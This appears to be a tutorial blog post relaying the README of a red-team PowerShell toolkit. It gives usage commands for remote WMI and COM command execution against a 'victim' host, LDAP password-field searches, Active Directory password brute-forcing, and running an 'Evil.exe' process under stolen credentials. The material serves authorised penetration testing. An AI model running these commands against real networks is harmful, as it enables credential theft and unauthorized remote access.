Ethical Hacking Tutorials

Ethical Hacking Tutorials, Tips and Tricks

Red Team Powershell Scripts


Various PowerShell scripts that may be useful during a red team exercise.

The repo includes the following scripts:

Search-EventForUser.ps1: Powershell script that search through the Windows event logs for specific user(s)
Search-FullNameToSamAccount.ps1: Full name to SamAccountName
Search-UserPassword.ps1: Search LDAP for userPassword field
Remote-WmiExecute.ps1: Execute command remotely using WMI
Take-Screenshot.ps1: Take a screenshot (PNG)
Get-BrowserHomepage.ps1: Get browser homepage
Get-IEBookmarks.ps1: List all Internet Explorer bookmarks URLs
Invoke-ADPasswordBruteForce.ps1: Test users password
Utility.ps1: Contain several cmdlets
Run-As.ps1: Run a process as another user (credentials)
module-import .Search-EventForUser.ps1; Search-EventForUser -TargetUser "MrUn1k0d3r"

module-import .Search-EventForUser.ps1; "MrUn1k0d3r" | Search-EventForUser

module-import .Search-EventForUser.ps1; Search-EventForUser -TargetUser MrUn1k0d3r -ComputerName DC01

module-import .Search-EventForUser.ps1; Search-EventForUser -TargetUser MrUn1k0d3r -FindDC true

module-import .Search-EventForUser.ps1; "god", "mom" | Search-EventForUser -FindDC true

module-import .Search-EventForUser.ps1; "god", "mom" | Search-EventForUser -FindDC true -Username DOMAINadmin -Password "123456"

The -User parameter support single user or a list of users from pipeline

module-import .Search-FullNameToSamAccount.ps1; Search-FullNameToSamAccount -Filter *god*

module-import .Search-FullNameToSamAccount.ps1; "god", "mom" | Search-FullNameToSamAccount
module-import .Search-UserPassword.ps1; Search-UserPassword -Username *god*

module-import .Search-UserPassword.ps1; "god", "mom" | Search-UserPassword
module-import .Remote-WmiExecute.ps1; Remote-WmiExecute -ComputerName victim01 -Payload "cmd.exe /c whoami"
module-import .Take-Screenshot.ps1; Take-Screenshot -Path C:test.png
module-import .Get-BrowserHomepage.ps1; Get-BrowserHomepage
module-import .Get-IEBookmarks.ps1; Get-IEBookmarks
module-import .Invoke-ADPasswordBruteForce; Invoke-ADPasswordBruteForce -Username "mr.un1k0d3r" -Password "password"

module-import .Invoke-ADPasswordBruteForce; "neo","morpheus" | Invoke-ADPasswordBruteForce -Password "password"

module-import .Invoke-ADPasswordBruteForce; "neo","morpheus" | Invoke-ADPasswordBruteForce -Password "password" -Domain MATRIX
module-import .Remote-COMShellExec.ps1; Remote-COMShellExec -ComputerName 192.168.1.1 -Command "cmd.exe" -Argument "/c whoami"

Contain de following cmdlets

Search-EventForUser
Search-FullNameToSamAccount
Ldap-GetProperty
Search-UserPassword
Dump-UserEmail
Dump-Computers
Dump-UserName
module-import .Run-As.ps1; Run-As -Username RingZer0Mr.Un1k0d3r -Password "IShouldNotLeakThisPasswordOnTheInternet" -Process "C:Evil.exe"

Nishang – PowerShell Penetration Testing Framework

Contain de following cmdlets

Invoke-COM-ScheduleService
Invoke-COM-XMLHTTP
Invoke-COM-ShellBrowserWindow
Invoke-COM-WindowsScriptHost
Invoke-COM-ProcessChain 
Invoke-COM-ShellApplication

Updated: May 14, 2019 — 8:12 am

Leave a Reply

Your email address will not be published. Required fields are marked *

Ethical Hacking Tutorials © 2018
Skip to toolbar